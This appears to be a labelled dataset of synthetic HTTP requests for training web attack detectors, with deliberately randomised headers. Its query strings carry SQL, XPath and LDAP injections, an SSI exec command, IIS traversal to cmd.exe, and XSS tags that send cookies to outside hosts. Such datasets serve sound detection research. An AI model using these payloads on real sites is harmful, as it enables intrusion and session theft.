Accept-Language: xa69-z;q=0.2, nt-emfsAirn, zcc-nprstty;q=0.7
Cache-Control: max-stale
Client-ip: 120.48.93.141
Cookie: 8form5n3=1074;havingZvstyleL6@f=8nvfireyrema
Cookie2: $Version="14"
Date: Thu, 21 Jan 10 01:59:25 GMT
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Fri, 23 Apr 10 09:32:35 UTC
If-Unmodified-Since: Fri, 30 Nov 07 02:59:55 CET
If-Match: "FszU6u84R8Olf7w@a0Ze"
If-None-Match: *
If-Range: Sun, 20 Aug 06 02:45:23 UTC
Max-Forwards: 770
MIME-Version: 9.9
Pragma: axsslp8e='wtsds'
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: Basic cm5mYWVPYW86bmdlbA==
Range: 11490-87515,-392,063833-721563
Referer: http://www.led4snt.cz/edbl/laqsCeoh/n9tjiwsk/ttbgt4eu.aspx
TE: gzip;q=0.7,deflate;q=0.3
Trailer: If-Match
User-Agent: T9ixpwn
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: 3.7 112.42.80.76:6
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 081 www.8wna8.jpg:64 "othhe5UTHRpeH" "Tue, 13 Jun 06 09:06:37 CET"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39698
Start - Id: 41897
class: SqlInjection
GET /2.4p/egdqconpitdqidMoaoPt.tiff?rei=wvJ3C.T.&TeSitole8e=getetlm&.B2WWfzsENhY=3e6ohhcogom%2Frnl%3Clike&oglaa=nSJs&msqGvpsd=yE+da1npassthrushutdownNhed4a%7EhbetweenyS&anr3t=aetnhtaccesWarEmndi&ZGfnode@B.xmlG2qs=%27++++%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F0%2F**%2FFROM%2F**%2Fsy2w%2F**%2FWHERE%2F**%2F%28++++%27%27+%3D%27++%2F**%2F&muYieiestttIac2=0&bioisoiaNecib=hCXth&_-1udByL=sE&dirunrrdp=djeeuuRoaht&itiioaabpas7=62&Glromai9lIs=aDv HTTP/1.1
Host: 155.233.150.200
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 199.227.44.84
Cookie: 0lpizparenst=PlW;seumdh7n6YETyxt=dsel;unlpuTddeyYp=592656429
Cookie2: $Version="6"
Date: Mon, 19 May 08 05:15:36 GMT
ETag: "ofotsShZb@38oZjIsB"
Expect: 100-continue
From: 7Adh@rholi48i.be
If-Modified-Since: Tue, 02 Jun 09 01:14:33 UTC
If-Unmodified-Since: Wed, 04 Jul 07 19:15:59 GMT
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: *
If-Range: Fri, 03 Aug 07 05:27:36 GMT
Max-Forwards: 546
MIME-Version: 7.9
Pragma: ir6n=enfy
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Basic aXJvdjpwZGJvdGhM
Range: 814292-
Referer: http://8txsetCn.st/tCgTw/torH/MuaeMl.sh
TE: gzip,deflate;q=0.9,chunked;q=0.8
Trailer: TE
User-Agent: Mozilla/7.4 (Machintosh; U; PPC Mac OS X 7.3; sr-nK; rv:1.3.3) Gecko/51713244
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9010x724
Via: 5.0 www.n2w6.htm:668, FTP/3.3 www.t2eoot.gif:971
Transfer-Encoding: deflate
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 643 206.216.27.149 "suiowsouaeabcnttoryg" "Thu, 27 Oct 05 01:48:14 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41897
Start - Id: 48986
class: XPathInjection
GET /jzb-x01/boadmqa05ener45R/nQvqtlrJ/6Emnesnte8atel5ha0ab/ee8/torPeFe7ooidnSMIfdb/oVTTKJ9cWHU99YZ/m7_P/9s4itioluiRt2l/4_c3L/oYXwxVt@Dg58xf7-L.asp?eiahwcnee0uytr=83+or+++1%3C++pt%2Fa%2Fld%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D++or+++757%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&7b4H1=6415&1tlq=eewMs5u HTTP/1.1
Host: www.xhafd6.com:32
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, identity, identity;q=0.5, compress, gzip
Accept-Language: tuls-n0utNOD6, ud4-tv, byeht-emlaqai;q=0.4, hfcod7r0-Jwm8da;q=0.8, sSi-DbercUi9;q=0.5
Cache-Control: no-cache
Client-ip: 102.111.118.138
Cookie: qvPCG=5NuGP;usrNDlGgKD=tlCF_SBw6mG;dsaourj=886;6t4Tooleatrih=21187796;ecam=std+;0oEf9a9wnQsH3ar=lee-
Cookie2: $Version="7"
Date: Sat, 09 Aug 08 03:03:08 UTC
ETag: "SIuC_mG3.D_K.LlO5Dn"
Expect: ochaoiy
From: 6icshpO@RtgPShLon.org
If-Modified-Since: Fri, 18 May 07 03:44:44 CET
If-Unmodified-Since: Fri, 14 Mar 08 22:01:14 UTC
If-Match: "Ji1bZJJEocmtxGF9aP"
If-None-Match: "MhMW9yZqmYbYFs9"
If-Range: Fri, 12 Jun 09 02:15:26 UTC
Max-Forwards: 9365
MIME-Version: 7.4
Pragma: Qi='eitIu'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Basic ZFJuYWFvaTplNmJ5
Range: 23-,057-,45-
Referer: http://www.fewoi.biz/itoKzodt/odoslesa/8de3atb.php4
TE: trailers,trailers,gzip;q=0.9
Trailer: From
User-Agent: O4a5feehe (ozH9qMc4)
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8171x6640
Via: glhd7/1.4 www.REHk.gif
Transfer-Encoding: compress
Upgrade: aivsar/6.5, Aensn/2.2
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48986
Start - Id: 41914
class: SqlInjection
GET /tiHW.b/HRqhR0PcwT74guX/bairegsjdsu/1cteOcsj5zehaswEt/e4Dalfomet/8eQd5xdeletezZoq-/nmnsAi3r71li.css?7drneromoe=870135255&YZKHYWOx-b=hoslocation7bOsamwd7&yttietrnoiAlw=OR+++%272Atxuai%27+++BETWEEN+%27R%27++AND+%27T%27 HTTP/1.0
Host: 214.48.211.199
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-ce, iso-10646-ucs-2, iso-2022-jp;q=0.3, cp-932;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=49170
Client-ip: 21.123.50.241
Cookie: dmetab= hon;3Hepnel=asht67aa;heo1ginlhDerl=linkiaDCInode|c'h
Cookie2: $Version="8"
Date: Sat, 15 Aug 09 04:46:27 GMT
ETag: "MLO5o.MWGTcwAKH2E"
Expect: 100-continue
From: whodpi@rrheriuA.net
If-Modified-Since: Mon, 11 Apr 05 13:58:59 UTC
If-Unmodified-Since: Fri, 15 Dec 06 08:53:13 GMT
If-Match: "goGjbVh2jWqePEZQ@QBg"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic Z250RmVlOmVlaG9scnll
Authorization: nini Hync=6Ipcvma
Range: -0
Referer: http://www.sxndoei.org/sltwo/xNYimrt/ideem.mpg
TE: gzip
Trailer: Via
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 3.3; vA-07; rv:4.4.2) Gecko/11074482
UA-CPU: PowerPC
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/7.2 www.Rsnie.shtml
Transfer-Encoding: 0dFe; fwLlo=trea3eht
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 206 www.hpaefstE.jpg "2ytytu1" "Wed, 13 Sep 06 14:39:38 GMT"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41914
Start - Id: 48481
class: XPathInjection
GET /mQbNtmp/nwRDW1OMeP5/a6nwe6dxoen/t2A0HG.js?ttdcx5mtct=sorm2&ieng5estn=Tu&RdeIaN2ri6=9964&hecsihsy=pnuserhe9tpadwae&e5=n%24r&eurrss9tu=wnscs+d&rceuwwzE1hbue=3oK&shkmie=auyexece2fdlngane&cl=%28Y8&J6uNY=lroshutdownrubhtpasshbgsoundh%7Eq&D9group bya26Ei=6089403598 HTTP/1.0
Host: 58.123.133.199
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, iso-2022-jp;q=0.6, iso-8859-4;q=0.2, windows-1253
Accept-Encoding: deflate;q=0.3, identity, gzip;q=0.2
Accept-Language: *
Cache-Control: no-store
Cookie: aiwnandd1etng=2gAsl2d9el;iemrnce5La=2n/o3Tn/eeslen/child::node()[  position()=947] | asmist/nma9t/5db0sn/child::text()[position()=058]   or   'the'='
Cookie2: $Version="67"
Date: Sun, 17 Apr 05 04:17:39 CET
ETag: "GwxuVzY0A0Ejlo6uY"
Expect: 100-continue
If-Modified-Since: Sun, 01 Feb 04 01:39:21 UTC
If-Unmodified-Since: Sun, 27 Dec 09 22:06:02 CET
If-Match: "-EtmvdQPF7F1104mI"
If-None-Match: *
If-Range: *
Max-Forwards: 3655
MIME-Version: 0.1
Pragma: n51='wkss7s'
Proxy-Authorization: Digest nonce
Authorization: Basic YXdFRWF5NnQ6YW81NDN1bA==
Range: 556-,789454-,8416-292
Referer: http://www.aaqi.st/QolhOka/9j7e.htm
TE: chunked;q=0.6,trailers
Trailer: Via
User-Agent: 6c6ihn (ne4-8p; l@2Qy12; s9xAH_bEB; a3fHjAV65)
Via: 6.6 147.202.84.226, biFsn/0.4 www.H0lea5s.html
Transfer-Encoding: gzip
Upgrade: lA4o/4.9
Warning: 217 www.doicU.tiff "mMeckkoef9" 
X-Forwarded-For: 95.68.224.9
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48481
Start - Id: 40043
class: SSI
GET /otmyrdiharyi.msf?unN=anms5b1treFXunx&uesstv=00&s14M=ea%3Dis&crqid=ieut%2F6idEehsp%3Fatre&wwooGrhOta=ey&XokiueofsrxO=ntd0Eazeehrgct%3En&mmeies5sx3aq=qQ6zxL&trdeqp5onT7t=135&6or=aoiRct7hof&8XpLtU8H=19261&eihsWna3fEg=0&sa=onst&jylnw9a=%3C%21--+++++%23exec+cmd%3D%22%2Fbin%2Fls+-l+++%2Fhome%2Fet%2Feeker%22+++--%3E&6nshlt=66320949 HTTP/1.0
Host: 14.125.233.46
Connection: rhaeaqm
Accept: */*;q=0.2
Accept-Charset: euc-cn, iso-10646-ucs-2;q=0.0, shift_jis;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=07
Client-ip: 128.159.25.86
Cookie: nnootrdztsbynMM=8416739662;fnE_sK_Qpe=tS]nigietttl
Cookie2: $Version="5"
Date: Sat, 06 Mar 04 15:24:42 UTC
ETag: "xJcfFu.TQv6CMJdq7b"
Expect: 100-continue
From: loaa@ioendeSshb.it
If-Modified-Since: Mon, 27 Apr 09 09:25:55 UTC
If-Unmodified-Since: Thu, 25 Oct 07 19:23:18 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Sep 08 10:03:53 UTC
Max-Forwards: 402
MIME-Version: 7.2
Pragma: botele3y='v'
Proxy-Authorization: Basic ZmhsdDp1YWx0ZQ==
Authorization: NTLM ajBnZW1kdHRvdW1hYXIxcmFpcGlvYmZPU2NuNnBldHQyMnV5RW9lYTVSbm9yaTN0
Range: 92956-
Referer: /uXlr6/Eirsz/rohbtae/3waedihj.jpg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 1.4; yr-ad; rv:5.9.8) Gecko/03097004
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 3.0 www.aUne.jpeg:1310
Transfer-Encoding: cndi6z; atsbsr9h=kaesyeLg
Upgrade: sonW0n/7.4, iecird/0.5, sihan/2.9
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 02001
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40043
Start - Id: 38610
class: LdapInjection
GET /n1F5Zqy/1input/a4IkulLpfPjG3tUZK6rF/de48tgoeh/et3SL0VY4qAQtM/anpaaevapagaugmlo/Eundas3jrc/aG/rG5lyiY9nvk7rlbfZmv/44rj4EgmniLTGvO.js?cEa=50%29%28%26%28objectClass%3D7ru%29%28%7C%28sn+++%3D++++fz%29%28cn%3Dn+J*%29%29&hrAdi=e0h&o50=1472924 HTTP/1.1
Host: www.hnvneoas.com
Connection: keep-alive
Accept: image/*;q=0.3, audio/*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.1, gzip, gzip;q=0.5
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 54.188.209.237
Cookie: 4re5uaMJAek9u=r28..80tVOh;tu=8ur;eitrkbpt=impm1OGa;wpsdlnihvtIf1=ex-jXLoD-P-;hta=wioCpitWuaehsmn
Cookie2: $Version="74"
Date: Thu, 15 Nov 07 24:18:20 UTC
ETag: W/"B3TaHLjmBKNvfeU"
Expect: yEraech
From: RwOaaelp@gdhst.com
If-Modified-Since: Sat, 05 Sep 09 15:22:28 UTC
If-Unmodified-Since: Sat, 17 Dec 05 01:07:13 CET
If-Match: *
If-None-Match: "nXgL6Y2iYeKg7yUT"
If-Range: Sun, 20 May 07 05:12:59 UTC
Max-Forwards: 531
MIME-Version: 0.3
Pragma: 1nt=oc1h
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: Idfgrb 5gP2s=Mns35Ra
Range: -348176
Referer: /llIeTey/CmsV/a0cc4m/bElRz.cfm
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 0.8; hw-yi; rv:7.7.1) Gecko/97253378
UA-CPU: StrongARM
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: 6.2 www.etsq.js
Transfer-Encoding: deflate
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 557 www.qUo1.jpeg "esote5naNsdrk" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38610
Start - Id: 38065
class: LdapInjection
GET /oNfplmmf9e0absrO0LN/l1354HG5h5g/AFeallZgKw/LQ3positionqOI3P4Ck%u/vut.cfm?Ws.tbetweenWcLNGs=7248618&hc=nl+r&dhrerkt3thmsn=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&IvCUZBcmail_R3z=eiyOyLOvyLov&eggi=9874&YWEpositionvqZvlnLftp=34&clhyms6an5=iJA9i.%40f&sxgfkeHy=6339598281&Rn=nOWkR&nkrli2ksker=6E89_p2%40XC9&odrenEeaei=a42UbXz HTTP/1.1
Host: 142.18.189.91
Connection: keep-alive
Accept: text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Oenetd-eri;q=0.0, eTzenBej-Irsk4aw;q=0.1
Cache-Control: no-store
Client-ip: 163.227.108.150
Cookie: ONU4DdFhtaccesIg=0es;rohomm7=tOV2
Cookie2: $Version="57"
Date: Fri, 24 Oct 08 12:03:00 GMT
ETag: "WyvG8K_AwpOUvCzMKd"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Mon, 04 Jun 07 24:52:15 UTC
If-Unmodified-Since: Sun, 14 Mar 04 19:05:37 GMT
If-Match: *
If-None-Match: *
If-Range: "UwI2G-4y1XRov01wDC"
Max-Forwards: 6
MIME-Version: 7.3
Pragma: robMf='esns'
Proxy-Authorization: NTLM ZWNnaGFuZm8xbXI0dGhlbnl3dGg5cnNhZThyaTZjZW5hcnNFYXJjVGRl
Authorization: Digest username="tezr"
Range: 77-,76-
Referer: /oew3rle/4flgl/cAanpk/mvu4ha0T.msf
TE: gzip;q=0.2
Trailer: Accept
User-Agent: mC6KbL9IyG http://www.9hdsdrfr.net
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5823x093
Via: FTP/4.4 www.teeLOto.js, 9.4 www.wdr1Nae.shtml
Transfer-Encoding: compress
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38065
Start - Id: 35231
class: SqlInjection
GET /tooeTHWic/JWD/hseeHeiaeiCoqeA/nTrmtnsT4endoci/sr3@mc586W5TWQsWWbe/dj.htm?akl=%27+++OR+++%27NCuioatfdhHn%27++++BETWEEN+%27R%27+++++AND++%27T&EuraThs=618441&hNr=heer HTTP/1.0
Host: 136.46.246.171
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.1, gzip;q=0.6, gzip;q=0.6, deflate
Accept-Language: *;q=0.5
Cache-Control: max-age=6
Client-ip: 77.106.13.151
Cookie: sgv9d6cmnd=swci4syii;dhmooo=9319656;bwstcno=exi
Cookie2: $Version="55"
Date: Sun, 14 Aug 05 21:55:47 CET
ETag: W/"bFb127kl2ale7r@.kL9"
Expect: 100-continue
From: oeeetot@ecjsbsx.org
If-Modified-Since: Thu, 18 Dec 08 01:53:35 CET
If-Unmodified-Since: Sun, 12 Apr 09 02:40:15 GMT
If-Match: *
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: Tue, 30 May 06 20:09:39 UTC
Max-Forwards: 0
MIME-Version: 1.4
Pragma: cusnt=cde0tptk
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: rnger ncT9l=sruax5
Range: -2,109-7
Referer: http://aa3ai.de/iipaa/ecyHet/xacT/grs20o/uzRggrej.asp
TE: chunked,chunked
Trailer: Warning
User-Agent: Mozilla/4.0 (X11; U; Linux i386 1.0; nt-Ya; rv:8.9.1) Gecko/51241933
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 1.6 www.cf5mc.html
Transfer-Encoding: compress
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35231
Start - Id: 44060
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 203.76.229.87
Connection: aropiuUo
Accept: audio/x-wav;q=0.0, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, gzip, gzip;q=0.6
Accept-Language: *
Cache-Control: max-age=61820
Client-ip: 11.19.174.55
Cookie: Ew2ttiht=tb;aNftscfg=passwd 8;orssn=l oK|nzLtege1lys;odEseP9=3;PwherehdjH=iiirnetcat ar;cV_nppX=loLev
Cookie2: $Version="43"
Date: Fri, 16 Sep 05 16:27:26 CET
ETag: W/"E39zcJPTTKayK1bm@"
Expect: 9ngplMf=itmleued
From: ctHO@rsrvtl.cz
If-Modified-Since: Sat, 29 Oct 05 24:14:28 CET
If-Unmodified-Since: Sun, 11 Jan 04 07:13:57 UTC
If-Match: *
If-None-Match: "_fd0fyKesV3Tnmi"
If-Range: "XIdU6YFkNmv.RQLm9@"
Max-Forwards: 982
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: haih yoils=Rrfosi0
Range: -4867,66-33,-6
Referer: http://www.nRof.net/ulti/uaap/jusht/fAboa.jpg
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/6.0 (compatible; Konqueror/9.7; Linux i386; ctrbnsontd; iee4rtNnjD)
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: HTTP/4.5 224.153.48.167
Transfer-Encoding: compress
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 175 26.216.110.35 "tt5rn4Ks" "Fri, 26 May 06 17:19:02 GMT"
X-Forwarded-For: 33.218.49.141
X-Serial-Number: 412280187
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44060
Start - Id: 47441
class: XSS
GET /ba/h1CWfl6@b10JnC4WfLO/wHTru/uj8gfofQ/ntwhis/iF.l/moatoocNczwlfy2tslrl/c@iEd_38Ih.NX.cfm?beoeasimbXeLyb=erldiie&37usyotcgic=557&palshtear=jmun&if6nsSo070te=bsiEe&uoA=smu6N&000CAtmpkHrcpHZwinnt=658&oethiagoqla=%27%5C+iJu&aa=b82kvQI_cwN&isamcp=%3Cimg++src+%3D++%22reattrllil+++%22onmouseover+++%3D+%22+++%5Bwindow.open%28%27http%3A%2F%2F63.120.50.144%2Folrase.pl%27%2Bdocument.cookie%29%3B%5D%22++++%3E&fncoudvliedn=l&aidut9=nbgsound+n&re=ewLO7o.AdTl. HTTP/1.0
Host: www.bee2qb.fr
Connection: mibmeiR
Accept: audio/basic
Accept-Charset: x-mac-greek;q=0.4, windows-1258, gb2312;q=0.9
Accept-Encoding: 
Accept-Language: ihgcor-uzoy, IRsn-ehcea3d;q=0.3
Cache-Control: max-age=05
Client-ip: 33.233.160.141
Cookie: iesuil8hr=autoexecnode;owadaiibLmc1xb=rrjIG@;in=ejnwbgtnddsDmtdj;group by7o6hIoGlsX=ga5enetkowe2;negoihfuS=86772
Cookie2: $Version="05"
Date: Fri, 23 Feb 07 17:13:00 GMT
ETag: W/"USbOQLZFotY12CP"
Expect: emr8ts
From: desfe5rt@owenslwi5e.org
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "cr9wjUcukfFuJApk9"
If-None-Match: *
If-Range: *
Max-Forwards: 9853
MIME-Version: 2.5
Pragma: sEbt='fq'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM SGVlaWl0eXR0aGlhMHBvZTVDYW1vb3VyY2FwNTZ0dE9Jc3ljbHp0cm55aWl5YWVz
Range: 13744-31405
Referer: /hiwf5he/ioyigbev/boelH9p.pl
TE: chunked;q=0.3,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/7.4 (Windows; U; WinNT 3.5; Hr-zh; rv:2.8.9) Gecko/47613533
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 644x740
Via: 3.6 www.5orevyr.png:07, 4.9 www.urHyuh.htm, 5.6 117.197.231.210
Transfer-Encoding: identity
Upgrade: ipodo/1.3, Abos/3.0, rwucs/0.4, xtsw4a/6.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 217.98.75.84
X-Serial-Number: 226091720709125
----: -----------
~~~~~: ~~~~~~~~~~

null

End - Id: 47441
Start - Id: 47056
class: XSS
GET /aX30uO5DWwvMu0z3jE3D/sPkbsAsgahcNqaewa/5he3imni/af8opeauohlwadomidOd/sf7K4BGmj/8Ltjnqsgso/e9J0KskQeTb/aJEmK/eteflun4rs/bt8hb/ilnhanpsAfqitt/xXzrOYqqAnfr-8.js?hb=%3Cimg+++src+++%3D++++%22+++mocha%3A%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.vest.com%2Fcgi-bin%2Fel.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E&ptrojhisso=120 HTTP/1.1
Host: www.teskboa.cz
Connection: tSs3be
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=25
Client-ip: 66.107.218.203
Cookie: 5Eyigdriltexre=h&t;shhfnp=orc;iiadmnoenKeeb=ssamrAhdocumentht;t4hem5eroent=30;sa=eNanD3rejYK;qini=651755667
Cookie2: $Version="8"
Date: Thu, 29 Dec 05 12:12:25 CET
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: ctya@sr6jtHsrss.cz
If-Modified-Since: Thu, 24 Dec 09 22:11:13 CET
If-Unmodified-Since: Wed, 05 Nov 08 13:22:42 CET
If-Match: "qBlIDkEWsqd1WmopfuOI"
If-None-Match: *
If-Range: Wed, 05 May 04 19:22:45 UTC
Max-Forwards: 28
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic dGVmdG81bXQ6enRlZ1I=
Authorization: Digest uri=http://www.re3ba6.cz/ritpti/aha8yls.txt
Range: 388869-790680,430-,-04157
Referer: http://Eljf9e.fr/ebhdr/voadWne.doc
TE: deflate;q=0.8
Trailer: Authorization
User-Agent: oyhye (4Ijw@8Wvm; cQcQZ4; mMJmcN)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 987x1282
Via: 4.1 www.eusEj.gif, FTP/9.9 www.greMyen.js
Transfer-Encoding: deflate
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 964 245.225.40.21:93731 "csa6ao3oxtd9hnfoert" "Tue, 16 Nov 04 02:10:40 CET"
X-Forwarded-For: 59.196.39.49
X-Serial-Number: 9140776636485
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47056
Start - Id: 43690
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.thEenate1j.com
Connection: close
Accept: */*
Accept-Charset: x-mac-ce, big5;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=91
Client-ip: 224.58.43.189
Cookie: pqtqeOtm5u1fta=438934;frctfnL=o\5iyun;w;stuesheGv8oa=74746;rdmto=i;Lmvo=ageh5tpcn
Cookie2: $Version="4"
Date: Thu, 16 Oct 08 04:08:06 UTC
ETag: W/"PNrp5mVZP0rueEpCM."
Expect: kkgrt5
From: o68nO@tetn70i.cz
If-Modified-Since: Tue, 19 Sep 06 17:53:15 CET
If-Unmodified-Since: Sun, 01 Oct 06 06:42:34 GMT
If-Match: "mJJG3z@q5TiwxT8jCP@"
If-None-Match: "lLIYoJsDh4TO26qq"
If-Range: "Q2gRfeoVn9h94TAk2mu"
Max-Forwards: 0
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: http://www.trroJ.be/ppfe/lDorn/oGsei/unzndxla.swf
TE: chunked,trailers,chunked
User-Agent: Mozilla/9.3 (Windows; U; Windows NT 5.5; of-ko; rv:5.7.5) Gecko/06267606
UA-CPU: StrongARM
UA-Disp: 0760,6921,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 827x275
Via: 0.0 161.147.139.21, FTP/3.9 www.eroatNd.png, 4.2 www.tAeou.gif
Transfer-Encoding: identity
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 965 www.lhcrhue2.jpeg "khnjidedehslccnwsp" "Tue, 25 Jan 05 20:48:31 UTC"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43690
Start - Id: 38844
class: LdapInjection
GET /nrOqa4oh/dS/tniPg/eSRE-dmrpekg@u-/edrIaejggu65ot/vO4LV9/8v9ZVG0EllxVVIEmGs/niZft-OLJmtqBdrNjXK/op0Et7Q/oD2/DBwG@l10bQB.asmx?wEsi=077322&ai=xEvdo3K&iual=%29+++%28++++%7C+++%28displayName%3Dhad*%29++%28name%3D+++had*+%29%28++mail%3Dhad*++++%29&1Y-wgetreplaceIdE9=83334077&ei9oytusssE=259&2fwre=r+ha%3Eaena8%26%5D7d%25&engede=78391650&u85rm0sbfgaS=0766&eatuws=eaRa+fteKnsg&habatAqtnsletxh=971218179&eysg5aAebTpa=scrumo0t HTTP/1.0
Host: 217.143.254.179:1885
Connection: keep-alive
Accept: */*
Accept-Charset: *
